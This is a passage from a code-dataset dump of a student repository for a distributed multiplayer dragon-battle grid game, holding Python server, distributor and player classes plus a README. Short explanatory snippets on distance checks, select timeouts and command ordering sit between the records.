Cannot move right\")\n return 0\n else:\n self.x += 1\n return 1\n\n def heal_player(self, player):\n \"\"\" heal another player. \"\"\"\n distance = self.get_distance(player)\n\n if distance > 5:\n print(\"Error: Healing failed! Distance is greater than 5.\")\n return 0\n else:\n heal_amount = min(self.ap, player.max_hp - player.hp)\n player.hp += heal_amount\n return 1\n"
},
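Range checks in Player.py all rest on the Manhattan distance `abs(dx) + abs(dy)`. The same check restated on plain coordinate tuples, for intuition (values are arbitrary):

    def manhattan(a, b):
        # the metric User.get_distance uses on the grid
        return abs(a[0] - b[0]) + abs(a[1] - b[1])

    attacker, victim = (3, 4), (5, 4)
    max_range = 2                       # a Player's maxrange in the game
    if manhattan(attacker, victim) <= max_range:
        print("attack lands")
    else:
        print("out of range")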
{
"alpha_fraction": 0.7551928758621216,
"alphanum_fraction": 0.7596439123153687,
"avg_line_length": 29.636363983154297,
"blob_id": "a91a48347c128920feb6ecaafb2fe14573519272",
"content_id": "c105c5820686283a62f13cf830aa73d21767012f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 674,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 22,
"path": "/README.md",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "# distributed-systems\nDistributed systems Das game\n\n\nToDo:\n- More parse functions\n- Disconnect etc functionality in server (Martijn, fixed)\n- Thread locking clients if ctrl + c -- FIX issue(Martijn, fixed)\n- regex for parse functions of client input (not neccesary, skipped)\n- game ticks\n- correctness check of commands\n\nLater:\n- Population server\n- Several server and sync\n- How to deal with disconnects\n\n\nissues:\n- Server_input -> select in while loop is blocking, so could be that self.keep_alive change is not parsed very fast. (possible fix, game tick timeout?)\n\n- Populator:If with no else line number 102. str(name_i) was not updated, changed it to i for time being.\n"
},
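The blocking-`select` issue noted above is what the server's tick timeout solves: passing a timeout to `select.select` turns the wait into a bounded game tick. A small standalone sketch of that idea on a throwaway listening socket (port chosen by the OS):

    import select
    import socket

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("localhost", 0))   # any free port
    sock.listen(5)

    for tick in range(3):
        # a 1-second timeout bounds the wait, so periodic work always runs
        readable, _, _ = select.select([sock], [], [], 1.0)
        if not readable:
            print("tick", tick, "- no messages, run the game tick")
    sock.close()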
{
"alpha_fraction": 0.45249950885772705,
"alphanum_fraction": 0.45901167392730713,
"avg_line_length": 45,
"blob_id": "af5e43aed8d12fb259e2f05ed50686f33606651c",
"content_id": "514110573f8fc11c6cf6d88cfce94ae5f21e250d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10442,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 227,
"path": "/distributor.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport random\nimport time\nimport math\nimport numpy as np\nimport os\nimport sys\n\nclass Distributor:\n def __init__(self, port=11000, life_time=1100, speedup=1, printing=True):\n # setup communication on this port\n self.own_port = port\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n # list of active game servers\n self.servers = []\n self.init_socket()\n # this only for experiments\n self.latencies = []\n\n # initialize the socket to listen to on own_port\n def init_socket(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n dist_address = ('localhost', self.own_port)\n print('Distributor starting up on {} port {}'.format(*dist_address))\n self.sock.bind(dist_address)\n # allow 10 connections at the same time, so that they wait for eachother\n self.sock.listen(10)\n\n def power_down(self):\n \"\"\" Close down the distributor. \"\"\"\n self.sock.close()\n if len(self.latencies) > 0:\n print(\"latencies are: \", self.latencies)\n print(\"Mean latency: \", np.mean(self.latencies))\n print(\"Standard deviation latency\", np.std(self.latencies))\n\n # add a server port to the server list\n def add_server(self, server_port, peer_port, lat, lng):\n # each server has a port, player number (TODO and location)\n server = [server_port, peer_port, lat, lng, 0]\n self.servers.append(server)\n\n # remove a server from the server list\n def remove_server(self, server_port):\n for i in range(len(self.servers)):\n if self.servers[i][0] == server_port:\n self.servers.pop(i)\n break\n\n # look for the best server port for a new player\n def add_player(self, lat, lng):\n best_server = None\n best_distance_players = None\n # check all known servers\n for server in self.servers:\n # get the euclidean distance\n distance = math.sqrt((server[2] - lat)**2 + (server[3] - lng)**2)\n players = server[4]+1\n # find the server with the lowest number of players * distance (is on index 2)\n if best_server == None or best_distance_players > (players*(distance+0.1)):\n best_server = server\n best_distance_players = players*(distance+0.1)\n\n # set it, but also get the player number dynamicly by communicating with servers\n best_server[4] += 1 # add 1 to the servers player count\n # prevent errors, but report on the closest server\n best_distance = 0 if best_distance_players == None else best_distance_players/(best_server[4])\n\n # send the player to the best server on the client port\n return best_server[0], best_distance\n\n def update_player_total(self, server_port, new_player_total):\n the_server = None\n # check all known servers\n for server in self.servers:\n # find the server with the matching port\n if server[0] == server_port:\n the_server = server\n break\n\n print(\"Server on port \", the_server[0], \"players=\", the_server[4], \"->\", new_player_total)\n the_server[4] = new_player_total\n\n\n # run this as a daemon to receive player join requests\n def read_ports(self):\n \"\"\" Read the sockets for new connections or player noticeses.\"\"\"\n self.sock.settimeout(1/self.speedup)\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # open up a new socket to communicate with this messager\n conn, addr = self.sock.accept()\n with conn:\n while True:\n data = conn.recv(1024)\n if not data:\n 
break\n message = data.decode('utf-8')\n\n # check for client connection to send him to a server\n if message.startswith('CLIENT|'):\n client_data = message.split(\"|\")\n if len(client_data) != 2:\n # ill defined message\n pass\n else:\n # get the latitude and longitude of the client from the message\n lat_lng = client_data[1].split(\";\")\n lat = float(lat_lng[0])\n lng = float(lat_lng[1])\n if len(self.servers) > 0:\n # get the best server for this player\n server_port, distance = self.add_player(lat, lng)\n distance_str = \"{:.4f}\".format(distance)\n self.latencies.append(distance)\n # send this server port to the client\n ret_mess = ('DIST|' + str(server_port) + \"|\" + distance_str).encode('UTF-8')\n conn.sendall(ret_mess)\n else:\n # TODO start up a server\n conn.sendall(b'NO_SERVER')\n\n # check for server message about its player total\n elif message.startswith('SERVER|'):\n server_stats = message.split(\"|\")\n if len(server_stats) != 3:\n # ill defined message\n pass\n else:\n try:\n # get the servers, so we know which one it is\n server_port = int(server_stats[1])\n # set the given player total\n new_player_total = int(server_stats[2])\n self.update_player_total(server_port, new_player_total)\n except ValueError:\n # message was not an integer\n pass\n\n # handles the first message of a new server\n elif message.startswith('NEW_SERVER|'):\n new_server_mess = message.split(\"|\")\n if len(new_server_mess) != 4:\n # ill defined mdist\n pass\n else:\n try:\n # get the client port and peer port of the server\n new_server_port = int(new_server_mess[1])\n new_server_peer_port = int(new_server_mess[2])\n\n # send back the peers that the server has\n ret_mess = 'DIST'\n if len(self.servers) == 0:\n # has no peers yet so let server know that he has to start the game\n ret_mess += '|NO_PEERS'\n else:\n for server in self.servers:\n # the peer server ports are saved at index 1\n peer_server_port = server[1]\n ret_mess += '|' + str(peer_server_port)\n ret_mess = ret_mess.encode('UTF-8')\n conn.sendall(ret_mess)\n\n # get the latitude and longitude of the server from the message\n lat_lng = new_server_mess[3].split(\";\")\n lat = float(lat_lng[0])\n lng = float(lat_lng[1])\n\n # add the server to the lists\n self.add_server(new_server_port, new_server_peer_port, lat, lng)\n except ValueError:\n # message was not an integer\n pass\n\n # check for server message about him stopping\n elif message.startswith('OUT_SERVER|'):\n server_stats = message.split(\"|\")\n if len(server_stats) != 2:\n # ill defined message\n pass\n else:\n try:\n # remove the server\n server_port = int(server_stats[1])\n self.remove_server(server_port)\n print(\"Distributor removed server, updated = \", self.servers)\n except ValueError:\n # message was not an integer\n pass\n else:\n # junk message\n pass\n\n\n # Handling stopping distributor\n except KeyboardInterrupt:\n # self.power_down()\n break\n\n # no message in set timeout, try again\n except socket.timeout:\n pass\n\n # always power down for right now\n print(\"Distributor shutting down\")\n self.power_down()\n\n\nif __name__ == '__main__':\n import sys\n listen_port = int(sys.argv[1])\n run_time = int(sys.argv[2])\n d = Distributor(port=listen_port, life_time=run_time)\n print(\"Created distributor process \" + str(listen_port))\n # let the distributor listen to all incoming messages until lifetime is up\n d.read_ports()\n print(\"Distributor closed on port \" + str(listen_port))\n"
},
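The distributor's `add_player` picks the server minimizing `(players + 1) * (distance + 0.1)` — load weighted by Euclidean distance, with the 0.1 keeping a co-located server's load from vanishing from the score. That rule isolated as a function; the tuples mirror the `[client_port, peer_port, lat, lng, players]` layout used above:

    import math

    def best_server(servers, lat, lng):
        best_port, best_score = None, None
        for port, peer_port, s_lat, s_lng, players in servers:
            distance = math.sqrt((s_lat - lat) ** 2 + (s_lng - lng) ** 2)
            score = (players + 1) * (distance + 0.1)   # same formula as add_player
            if best_score is None or score < best_score:
                best_port, best_score = port, score
        return best_port

    servers = [[10000, 10100, 0.2, 0.2, 5], [10001, 10101, 0.8, 0.8, 1]]
    print(best_server(servers, 0.9, 0.9))   # -> 10001: close by and nearly empty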
{
"alpha_fraction": 0.5139873027801514,
"alphanum_fraction": 0.5255501866340637,
"avg_line_length": 28.788888931274414,
"blob_id": "54516d3d90be53f617605517ace59f12d515f79d",
"content_id": "f6607c89388acba4582fd0eb7ec48c18dbfca7dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2681,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 90,
"path": "/PlayerV2.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "\"\"\"\n-- Player Control --\nDate Created: 3 December 2018\n\"\"\"\n\nimport random\n\nclass Player:\n\n # Constant Variables\n MIN_USER_AP = 1\n MAX_USER_AP = 10\n MIN_USER_HP = 10\n MAX_USER_HP = 20\n MIN_DRAGON_AP = 5\n MAX_DRAGON_AP = 20\n MIN_DRAGON_HP = 50\n MAX_DRAGON_HP = 100\n MAX_HEAL_DIST = 5\n MAX_ATT_DIST = 2\n\n def __init__(self, ID, type, x, y):\n self.ID = ID\n self.type = type\n self.x = x\n self.y = y\n if type == 'user':\n self.max_hp = random.randint(MIN_USER_HP,MAX_USER_HP)\n self.ap = random.randint(MIN_USER_AP,MAX_USER_AP)\n self.hp = max_hp\n elif type == 'dragon':\n self.hp = random.randint(MIN_DRAGON_HP,MAX_DRAGON_HP)\n self.ap = random.randint(MIN_DRAGON_AP,MAX_DRAGON_AP)\n\n def get_distance(player):\n return math.abs(self.x - player.x) + math.abs(self.y - player.y)\n\n def attack_player(victim):\n distance = get_distance(victim)\n\n if distance > MAX_ATT_DIST:\n print(\"Error: Attack not valid! Distance is grater than 2.\")\n else:\n victim.hp -= self.ap\n if victim.hp <= 0:\n print(\"Victim is dead! Remove victim from game.\")\n\n def heal_player(player):\n distance = get_distance(player)\n\n if distance > MAX_HEAL_DIST:\n print(\"Error: Healing invalid! Distance is greater than 5.\")\n\n if player.type == 'dragon':\n print(\"Error: Healing invalid! Cannot heal a dragon.\")\n else:\n heal_amount = self.ap\n player.hp += heal_amount\n\n if player.hp >= player.max_hp:\n player.hp = player.max_hp\n\n def move_player(direction):\n\n if direction == \"up\":\n if self.y == board.height:\n print(\"Error: Invalid move! Cannot move up, player on the edge.\")\n else:\n self.y += 1\n elif direction == \"down\":\n if self.y == 0:\n print(\"Error: Invalid move! Cannot move down, player on the edge.\")\n else:\n self.y -= 1\n elif direction == \"left\":\n if self.x == 0:\n print(\"Error: Invalid move! Cannot move left, player on the edge.\")\n else:\n self.x -= 1\n elif direction == \"right\":\n if self.x == board.width:\n print(\"Error: Invalid move! Cannot move right, player on the edge.\")\n else:\n self.x += 1\n\n def connect_player():\n \"\"\"A function to connect a player to a game\"\"\"\"\n\n def disconnect_player():\n \"\"\"A function to disconnect player from a game\"\"\"\n"
},
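A side effect of the stat ranges above: a freshly rolled dragon always has more hit points than any user, since the two ranges are disjoint. A quick standalone check using the same `random.randint` bounds, no class required:

    import random

    user_hp = random.randint(10, 20)     # MIN_USER_HP .. MAX_USER_HP
    dragon_hp = random.randint(50, 100)  # MIN_DRAGON_HP .. MAX_DRAGON_HP
    print(user_hp, dragon_hp, dragon_hp > user_hp)   # always True: ranges do not overlap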
{
"alpha_fraction": 0.49412769079208374,
"alphanum_fraction": 0.5019004940986633,
"avg_line_length": 41.806217193603516,
"blob_id": "2d5ae4294962dcce4e4f484f24706cfe8b43a10c",
"content_id": "394a84d09312aec7ddbb6ab2003dd07597c08a43",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23415,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 547,
"path": "/server.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "import socket\nimport select\nimport random\nimport time\nfrom Game import *\nfrom queue import Queue, Empty\nfrom threading import Thread\nimport os\nimport sys\n\n\nclass Server:\n def __init__(self, port=10000, peer_port=10100, life_time=None, check_alive=1, ID=0, lat=1, lng=1, num_dragons=1, speedup=1.0, printing=True):\n # we could also place object on a 25x25 grid\n self.port = port\n self.peer_port = peer_port\n self.lat = lat\n self.lng = lng\n self.life_time = life_time\n self.start_time = time.time()\n self.speedup = speedup\n # do not print to terminal for experiments\n self.printing = printing\n if not self.printing:\n sys.stdout = open(os.devnull, 'w')\n self.check_alive = check_alive\n self.tickdata = b''\n self.game_started = False\n self.game = Game(self, ID,2,1)\n self.ID_connection = {}\n self.server_queue = Queue()\n self.peer_queue = Queue()\n filename = 'logfile{}'.format(self.game.ID)\n self.log = open(filename,'w')\n\n self.start_up(num_dragons, port, peer_port)\n\n\n\n def start_up(self, num_dragons, port=10000, peer_port=10100):\n \"\"\" Create an server for das game. Each server will maintain a number of dragons.\"\"\"\n # Create a TCP/IP socket\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n found_free_port = False\n while not found_free_port:\n try:\n server_address = ('localhost', self.port)\n self.sock.bind(server_address)\n print('Server starting up on {} port {}'.format(*server_address))\n found_free_port = True\n self.connections = [self.sock]\n except OSError:\n print(\"Given server port was in use, trying similar...\")\n self.port += 10000\n if self.port >= 100000:\n raise OSError('Cant find a suitable server port.')\n\n # create the set number of dragons for this server\n self.dragonlist = []\n for i in range(int(num_dragons)):\n self.create_dragon()\n # if number was float, give the residual a chance to become a dragon\n # meaning: 3.2 has a 20% chance of creating a 4th dragon\n if random.random() < (num_dragons%1):\n self.create_dragon()\n\n # Listen for incoming connections\n self.sock.listen(30)\n\n # FOR PEERS\n # Create a TCP/IP socket\n self.peer_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n found_free_port = False\n while not found_free_port:\n try:\n server_peer_address = ('localhost', self.peer_port)\n self.peer_sock.bind(server_peer_address)\n print('Peer server starting up on {} port {}'.format(*server_peer_address))\n found_free_port = True\n self.peer_connections = [self.peer_sock]\n except OSError:\n print(\"Given peer port was in use, trying similar...\")\n self.peer_port += 10000\n if self.peer_port >= 100000:\n raise OSError('Cant find a suitable peer port.')\n\n # Listen for incoming connections\n self.peer_sock.listen(4)\n\n\n def receive_grid(self, peer_socket):\n \"\"\" Receive the current state of the grid from the server. \"\"\"\n data = \"\"\n # Keep receiving until an end has been send. 
TCP gives in order arrival\n while True:\n data += peer_socket.recv(128).decode('utf-8')\n if data[-3:] == \"end\":\n break\n\n #Parse the data so that the user contains the whole grid.\n # type, ID, x, y, hp , ap,\n data = data[:-3].split(\";\")\n del data[-1]\n for i in range(0, len(data), 6):\n playerdata = data[i:i+6]\n if playerdata[0] == \"Player\":\n player = Player(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n elif playerdata[0] == \"Dragon\":\n player = Dragon(playerdata[1], int(playerdata[2]), int(playerdata[3]) ,self.game)\n player.hp = int(playerdata[4])\n player.ap = int(playerdata[5])\n\n self.game.add_player(player)\n\n #print ( \"Server succesfully received grid \")\n\n def tell_distributor(self, distr_port):\n \"\"\"tell the distributor you exist, and get back list of your peers, and connect with peers\"\"\"\n self.distr_port = distr_port\n\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n lat_str = \"{:.4f}\".format(self.lat)\n lng_str = \"{:.4f}\".format(self.lng)\n join_mess = 'NEW_SERVER|' + str(self.port) + '|' + str(self.peer_port) + \\\n '|' + lat_str + ';' + lng_str\n send_mess = (join_mess).encode('UTF-8')\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n # get a peer server port back from the distributor\n data = s.recv(1024)\n\n message = data.decode('utf-8')\n if message.startswith('DIST|'):\n dist_mess = message.split(\"|\")\n if len(dist_mess) < 2:\n # ill defined message\n pass\n else:\n # the other parts of the message are his peers ports\n for i in range(1, len(dist_mess)):\n try:\n peer_port = int(dist_mess[i])\n # create a new socket for this peer\n peer_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Connect the socket to the port where the server is listening\n peer_address = ('localhost', peer_port)\n print('Peer connecting to {} port {}'.format(*peer_address))\n peer_socket.connect(peer_address)\n self.peer_connections.append(peer_socket)\n\n if i == len(dist_mess)-1:\n peer_socket.send(b'getgrid')\n self.receive_grid(peer_socket)\n\n except ValueError:\n # message was not an integer\n pass\n # now start listening on the peer ports\n self.start_peer_receiving()\n\n\n def create_dragon(self):\n \"\"\" Create a dragon on the battlefield and send dragon to other all players. \"\"\"\n x = random.randint(0,25)\n y = random.randint(0,25)\n dragon = Dragon(str(self.game.ID), x,y, self.game)\n message = \"{};addeddragon;{};{};{};{};{};end\".format(time.time(),dragon.ID, dragon.x, dragon.y, dragon.hp, dragon.ap)\n self.tickdata += message.encode(\"utf-8\")\n self.game.add_player(dragon)\n self.dragonlist.append(dragon)\n self.game.ID += 1\n\n def dragon_moves(self):\n \"\"\" Let the server create moves for the dragons. 
\"\"\"\n message = \"\"\n # If dragon has died, remove it from server.\n dragonlist = []\n for dragon in self.dragonlist:\n if dragon.hp > 0:\n dragonlist.append(dragon)\n self.dragonlist = dragonlist\n\n # Look for player around me\n for dragon in self.dragonlist:\n playerlist = []\n for object in self.game.players.values():\n if isinstance(object, Player) and dragon.get_distance(object) < 5:\n playerlist.append(object)\n\n # randomly select one of the players\n if playerlist:\n message += \"{};attack;{};{};end\".format(time.time(),dragon.ID, random.choice(playerlist).ID)\n\n return message\n\n\n\n def power_down(self):\n \"\"\" Close down the server. \"\"\"\n for connection in self.connections[1:]:\n connection.close()\n # tell the distributor youre stopping\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n send_mess = ('OUT_SERVER|' + str(self.port)).encode('UTF-8')\n try:\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n except ConnectionRefusedError:\n pass\n\n def peer_power_down(self):\n \"\"\"close peer connections. \"\"\"\n for peer_connection in self.peer_connections[1:]:\n try:\n peer_connection.shutdown(socket.SHUT_WR)\n except OSError:\n print(\"Peer socket already closed.\")\n\n def broadcast_clients(self, data):\n \"\"\" Broadcast the message from 1 client to other clients\"\"\"\n # Send data to other clients\n for clients in self.connections[1:]:\n clients.sendall(data)\n\n def broadcast_servers(self, data):\n \"\"\" Broadcast the message to other servers\"\"\"\n # Send data to other clients\n for server in self.peer_connections[1:]:\n try:\n server.sendall(data)\n except ConnectionResetError:\n print(\"This peer got removed \", str(server))\n except BrokenPipeError:\n print(\"This peer game ended \", str(server))\n\n def send_grid(self, client, theirplayerID):\n \"\"\"Send the grid to new players or new server\"\"\"\n\n for player in self.game.players.values():\n if player.ID == theirplayerID:\n data = \"{};{};{};{};{};{};\".format(\"Myplayer\", player.ID, player.x, player.y, player.hp, player.ap)\n else:\n data = \"{};{};{};{};{};{};\".format( player.type, player.ID, player.x, player.y, player.hp, player.ap)\n client.sendall(data.encode('utf-8'))\n # Send ending character\n client.sendall(b\"end\")\n #print(\"finished sending grid\")\n\n def send_grid_server(self, server):\n \"\"\"Send the grid to a new server\"\"\"\n\n for player in self.game.players.values():\n data = \"{};{};{};{};{};{};\".format( player.type, player.ID, player.x, player.y, player.hp, player.ap)\n server.sendall(data.encode('utf-8'))\n # Send ending character\n server.sendall(b\"end\")\n #print(\"finished sending grid to SERVER\")\n\n def create_player(self, client):\n \"\"\"Create a player and message this to every body else.\"\"\"\n # Make sure that new player doesn't spawn on old player\n while True:\n x = random.randint(0,25)\n y = random.randint(0,25)\n if self.game.map[y][x] == \"*\":\n break\n\n player = Player(str(self.game.ID), x, y, self.game)\n self.ID_connection[client] = player\n self.game.ID += 1\n self.game.add_player(player)\n self.send_grid(client, player.ID)\n\n # Send data to other clients\n message = \"{};join;{};{};{};{};{};end\".format(time.time(),player.ID, player.x, player.y, player.hp, player.ap)\n self.tickdata += message.encode(\"utf-8\")\n\n def remove_client(self, client):\n \"\"\" Removing client if disconnection happens\"\"\"\n player = 
self.ID_connection[client]\n playerID = player.ID\n\n if player.hp > 0:\n #self.game.remove_player(player)\n message = \"{};leave;{};end\".format(time.time(), playerID)\n self.tickdata += message.encode(\"utf-8\")\n\n self.connections.remove(client)\n print(\"connection closed\")\n\n def remove_peer(self, peer):\n \"\"\" Removing peer if shutdown happens\"\"\"\n self.peer_connections.remove(peer)\n print(\"Peer connection closed\")\n\n\n def read_ports(self):\n \"\"\" Read the sockets for new connections or player noticeses.\"\"\"\n log = self.log\n\n self.time_out = self.check_alive\n # Game ticks at whole seconds\n\n game_ended = False\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # Wait for a connection, based on actual seconds\n # dont sync on whole seconds, but whole second/speedup\n self.time_out = int(time.time()*self.speedup) + 1 - time.time()*self.speedup\n readable, writable, errored = select.select(self.connections, [], [], self.time_out/self.speedup)\n\n # check for a game end scenario, where either all players or dragons are dead\n if self.game_started:\n client_total = 0\n dragon_total = 0\n for object in self.game.players.values():\n if isinstance(object, Player):\n client_total += 1\n elif isinstance(object, Dragon):\n dragon_total += 1\n # make sure you havent ended the game already\n if not game_ended:\n # if either is 0, send message to peers and set life time to 10\n # 10 means sending the message 10 more times, then shut down\n if client_total == 0:\n print(\"DRAGONS WIN THE GAME\")\n log.write(\"WIN DRAGONS\" + '\\n')\n self.life_time = 10\n self.broadcast_servers(b'WIN DRAGONS')\n game_ended = True\n elif dragon_total == 0:\n print(\"PLAYERS WIN THE GAME\")\n log.write(\"WIN PLAYERS\" + '\\n')\n self.life_time = 10\n self.broadcast_servers(b'WIN PLAYERS')\n game_ended = True\n print(\"Clients:\", client_total, \"Dragons:\", dragon_total)\n\n # update the peer connections for the main process\n while not self.peer_queue.empty():\n data = self.peer_queue.get()\n if data[0] == 'getgrid':\n self.send_grid_server(data[1])\n self.peer_queue.task_done()\n # make sure you havent ended the game already\n elif not game_ended:\n if (data == b'WIN PLAYERS'):\n print(\"PLAYERS WIN THE GAME (told by other server)\")\n log.write(\"WIN PLAYERS\" + '\\n')\n self.life_time = 10\n game_ended = True\n elif (data == b'WIN DRAGONS'):\n print(\"DRAGONS WIN THE GAME (told by other server)\")\n log.write(\"WIN DRAGONS\" + '\\n')\n self.life_time = 10\n game_ended = True\n else:\n peer_connection = data[0]\n if peer_connection not in self.peer_connections:\n self.peer_connections.append(peer_connection)\n self.peer_queue.task_done()\n\n if not readable and not writable and not errored:\n # timeout is reached, just send player total to the distributor\n # create socket for single communication with distributor\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n # send a message to the distributor\n send_mess = ('SERVER|' + str(self.port) + '|' + str(len(self.connections)-1)).encode('UTF-8')\n try:\n s.connect(('localhost', self.distr_port))\n s.sendall(send_mess)\n except ConnectionRefusedError:\n pass\n print(\"No message received\")\n\n\n # Make some dragon moves.\n dragon_data = self.dragon_moves()\n if dragon_data:\n self.tickdata += (dragon_data).encode('utf-8')\n\n # Always send a message, just send test message if nothing need to ben synced.\n if self.tickdata:\n self.broadcast_servers(self.tickdata)\n else:\n 
self.broadcast_servers(b\"test\")\n\n\n # Change to num_server - 1\n server_count = 1 # Own peer also in list\n while not server_count == len(self.peer_connections):\n try:\n data = self.server_queue.get(block=True, timeout=0.1/self.speedup)\n if data == b'test':\n pass\n else:\n self.tickdata += data\n self.server_queue.task_done()\n except Empty:\n print(\"Late response from peer\")\n server_count += 1\n\n # Sort the data\n data = self.tickdata.decode('utf-8')\n if data:\n data = data.split(\"end\")[:-1] # Last end will give a empty index\n\n # Parse data\n data = sorted(data, key=lambda x: float(x.partition(';')[0]))\n\n senddata = []\n for command in data:\n if self.game.update_grid(command):\n senddata.append(command)\n log.write(command + '\\n')\n else:\n log.write(\"invalid update\" + '\\n')\n\n # Send to clients\n data = 'end'.join(senddata) + \"endupdate\"\n #print(\"Data that will be broadcasted: \", data)\n self.broadcast_clients(data.encode('utf-8'))\n\n # Some other handling stuff\n self.tickdata = b''\n #print(\"Finished sending my grid to other servers.\")\n\n else:\n # got a message\n for client in readable:\n # If server side, then new connection\n if client is self.sock:\n connection, client_address = self.sock.accept()\n self.create_player(connection)\n self.connections.append(connection)\n # start the game if this is the first player to join\n if not self.game_started:\n self.game_started = True\n # Else we have some data\n else:\n try:\n data = client.recv(64)\n #print(\"SERVER RECEIVED\", data)\n if data:\n self.tickdata += ((str(time.time())+';').encode('utf-8') + data)\n else: #connection has closed\n self.remove_client(client)\n except ConnectionResetError:\n pass\n\n\n # Handling stopping servers and closing connections.\n except KeyboardInterrupt:\n self.power_down()\n break\n\n # always power down for right now\n print(\"Server shutting down\")\n log.close()\n self.power_down()\n\n def start_peer_receiving(self):\n \"\"\"Thread for doing moves + send moves\"\"\"\n Thread(target=self.read_peer_ports, daemon = True).start()\n\n def read_peer_ports(self):\n \"\"\" Read the sockets for new peer connections or peer game updates.\"\"\"\n\n while (self.life_time == None) or (self.life_time > (time.time() - self.start_time)*self.speedup):\n try:\n # Wait for a connection\n readable, writable, errored = select.select(self.peer_connections, [], [], self.check_alive/self.speedup)\n if not readable and not writable and not errored:\n # timeout is reached\n pass\n\n else:\n # got a message\n for peer in readable:\n # If server side, then new peer connection\n if peer is self.peer_sock:\n connection, peer_address = self.peer_sock.accept()\n print (\"Peer connected from {}\".format(peer_address))\n if connection not in self.peer_connections:\n self.peer_connections.append(connection)\n new_peer_message = \"NEW_PEER|\" + str()\n self.peer_queue.put((connection,))\n # Else we have some data from a peer\n else:\n try:\n data = peer.recv(1028)\n if data == b'getgrid':\n self.peer_queue.put(('getgrid', peer))\n continue\n if (data.decode('utf-8').startswith('WIN PLAYERS')) or (data.decode('utf-8').startswith('WIN DRAGONS')):\n self.life_time = 0\n if data:\n # Putting data in queue so it can be read by server\n #print(self.peer_port, \" received \", data)\n self.server_queue.put(data)\n else: #connection has closed\n self.remove_peer(peer)\n except ConnectionResetError:\n self.remove_peer(peer)\n\n # Handling stopping servers and closing connections.\n except KeyboardInterrupt:\n 
self.power_down()\n break\n\n # always power down for right now\n print(\"Peer server shutting down\")\n time.sleep(1/self.speedup)\n self.peer_power_down()\n\n\nif __name__ == '__main__':\n import sys\n client_port = int(sys.argv[1])\n peer_port = int(sys.argv[2])\n distr_port = int(sys.argv[3])\n run_time = int(sys.argv[4])\n check_alive = int(sys.argv[5])\n server_id = int(sys.argv[6])\n lat = int(sys.argv[7])\n lng = int(sys.argv[8])\n num_dragons = int(sys.argv[9])\n\n # Setup a new server\n s = Server(port=client_port, peer_port=peer_port, life_time=run_time, check_alive=check_alive,\n ID=server_id, lat=lat, lng=lng, num_dragons=num_dragons)\n print(\"Created server process \" + str(client_port))\n # tell the distributor you exist\n s.tell_distributor(distr_port)\n # let the server handle all incoming messages\n s.read_ports()\n print(\"Server closed on port \" + str(client_port))\n"
},
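The server loop above gets replica consistency from deterministic ordering: each tick's buffered commands carry a timestamp prefix, peers exchange their buffers, and every server sorts the merged batch on the timestamp before applying it, so all replicas process the identical sequence. That sort in isolation, with made-up commands in the repo's `timestamp;verb;...end` format:

    tickdata = "1005.2;attack;p1;d0end1001.7;move;p2;leftend1003.9;heal;p3;p1end"

    commands = tickdata.split("end")[:-1]   # the trailing split is empty
    commands = sorted(commands, key=lambda c: float(c.partition(";")[0]))
    for command in commands:
        print(command)   # applied oldest-first on every server replica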
{
"alpha_fraction": 0.41928720474243164,
"alphanum_fraction": 0.44863730669021606,
"avg_line_length": 19.7391300201416,
"blob_id": "c9414f3e7f09a1d315918f1bb77734f08250291d",
"content_id": "7bd6f27d8346a6c63d9be8377ba68b0dc707ddae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 477,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 23,
"path": "/Arena.py",
"repo_name": "neverbeam/distributed-systems",
"src_encoding": "UTF-8",
"text": "\"\"\"\nAuthor: Kevin Rojer & Ali Almoshawah\nVersion: 1.0\nDate: 30 November 2018\n\"\"\"\n\nclass Arena:\n\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n def draw_grid(self):\n for y in range(self.height):\n for x in range(self.width):\n #(\"%%-%ds\" % 2 % '.', end=\"\")\n print(\"{}{}\".format(\".\", 2 * \" \" ), end=\"\")\n print()\n\n\nif __name__ == '__main__':\n g = Arena(25,25)\n g.draw_grid()\n"
}
] | 9 |
